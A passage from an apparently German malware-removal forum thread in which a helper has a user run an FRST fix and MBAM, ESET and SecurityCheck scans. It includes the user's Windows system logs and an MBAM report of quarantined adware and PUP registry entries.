Error: (04/24/2016 11:11:44 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2" in Zeile C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest.

Error: (04/24/2016 11:08:28 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest2" in Zeile C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22.manifest.
Komponente 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528.manifest.

Error: (04/24/2016 10:31:11 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/24/2016 10:30:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/24/2016 10:25:27 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.WindowsPhone_8wekyb3d8bbwe!CompanionApp.App“ ist folgender Fehler aufgetreten: -2147024770. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.


Systemfehler:
=============
Error: (04/28/2016 09:32:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_3a4e25c" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:32:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _3a4e25c" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:32:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_3a4e25c" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/28/2016 09:32:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_3a4e25c" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 07:59:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_3562570" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 07:59:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _3562570" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 07:59:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_3562570" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 07:59:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_3562570" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 05:57:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_340b480" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/27/2016 05:57:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _340b480" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2016-04-27 19:39:05.747
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 19:39:05.739
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 19:39:05.732
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 19:39:05.391
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 19:39:05.379
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 16:29:07.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 16:29:07.646
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 16:29:07.637
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 16:29:07.491
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-27 16:29:07.481
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 8173.24 MB
Verfügbarer physikalischer RAM: 5418.2 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 13775.09 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:752.59 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:8.51 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

cosinus 29.04.2016 09:14
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
GroupPolicyUsers\S-1-5-21-2630849102-760198568-3561441068-1004\User: Beschränkung <======= ACHTUNG
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 30.04.2016 15:45
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-30 16:42:13) Run:7
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
GroupPolicyUsers\S-1-5-21-2630849102-760198568-3561441068-1004\User: Beschränkung <======= ACHTUNG
emptytemp:
       
*****************

C:\WINDOWS\system32\GroupPolicyUsers\S-1-5-21-2630849102-760198568-3561441068-1004\User => erfolgreich verschoben
EmptyTemp: => 384.8 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 16:42:16 ====

cosinus 30.04.2016 16:27
Okay, dann Kontrollscans mit (1) MBAM, (2) ESET und (3) SecurityCheck bitte:


1. Schritt: MBAM

Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.




2. Schritt: ESET

ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset




3. Schritt: SecurityCheck

Downloade Dir bitte SecurityCheck und:

  • Speichere es auf dem Desktop.
  • Starte SecurityCheck.exe und folge den Anweisungen in der DOS-Box.
  • Wenn der Scan beendet wurde sollte sich ein Textdokument (checkup.txt) öffnen.
Poste den Inhalt bitte hier.

StOony 01.05.2016 01:05
MBAM 1

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org


Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Remediation Database, 2016.2.12.1, 2016.4.19.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Rootkit Database, 2016.2.8.1, 2016.4.17.1,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Domain Database, 2016.2.16.8, 2016.4.22.6,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, Malware Database, 2016.2.16.6, 2016.4.24.5,
Update, 24.04.2016 22:03, SYSTEM, HARUN-PC, Manual, IP Database, 2016.2.8.1, 2016.4.7.1,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:03, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Scan, 24.04.2016 22:07, SYSTEM, HARUN-PC, Manual, Start: 24.04.2016 22:03, Dauer: 3 Min. 36 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 277 Nicht-Malware-Erkennungen,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 24.04.2016 22:08, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,

(end)
MBAM 2

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 24.04.2016
Suchlaufzeit: 22:03
Protokolldatei: MBAM 2.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.04.24.05
Rootkit-Datenbank: v2016.04.17.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Harun

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 456629
Abgelaufene Zeit: 3 Min., 36 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 11
PUP.Optional.YesSearches, HKU\S-1-5-18\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [f6af59590e8b1d1915e07f4525dde21e],
PUP.Optional.YesSearches, HKU\S-1-5-21-2630849102-760198568-3561441068-1000\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [9510882ae6b3e65054a1e2e2bb472bd5],
PUP.Optional.YesSearches, HKLM\SOFTWARE\{A16B1AF7-982D-40C3-B5C1-633E1A6A6678}, In Quarantäne, [297c04ae9aff64d2bc39a3217191926e],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR  , In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040],
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc],
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}, In Quarantäne, [edb8971b9306ff371f5728166c97a957],
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE, In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\WajIEnhance, In Quarantäne, [2a7b0ca6d2c7f640e800b3a2fa0abb45],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5],
PUP.Optional.Wajam, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\WajIEnhance, In Quarantäne, [6f363b778a0fb185da0eee67e2221fe1],
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26],

Registrierungswerte: 11
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr  |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 131019213678783523, In Quarantäne, [c7ded2e0e8b1ee48cb5f6ae98183c040]
PUP.Optional.IFEO, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [6a3bab078f0a2214c849e54fe22244bc]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|hp, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [edb8971b9306ff371f5728166c97a957]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|tab, hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext, In Quarantäne, [a203fcb62178cc6a04723806857e728e]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|sp, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffsengext, In Quarantäne, [7233bef4e9b00630db9bf648877c7789]
PUP.Optional.YesSearches, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|surl, hxxp://www.yessearches.com/chrome.php?uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&ts=AHEpBnEoBn0qB0..&v=20160301&mode=ffexttoolbar&q=, In Quarantäne, [4e570fa36f2a5dd993e396a8c043a65a]
PUP.Optional.IFEO, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SKYPE.EXE|Debugger, "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe", In Quarantäne, [b6ef159dfd9cc175f51c84b0a1639868]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [267fefc37821082ec6aeabe5c83c1be5]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1004\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [f7ae62508d0c57df650f632d11f306fa]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|HomePage, hxxp://systemhealer.com/, In Quarantäne, [5e471a98a7f22b0bf87cd3bd7391da26]
PUP.Optional.SystemHealer, HKU\S-1-5-21-2630849102-760198568-3561441068-1009\SOFTWARE\SYSTEM HEALER|SupportPage, hxxp://systemhealer.com/support/#contact, In Quarantäne, [4f56e5cd9ffa39fd462e98f80df76f91]

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 60
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\bookmarkbackups, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\crashes\events, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\datareporting\archived\2015-10, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\base, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\content\engines, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\fonts, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\css\images, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\dnt-api, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
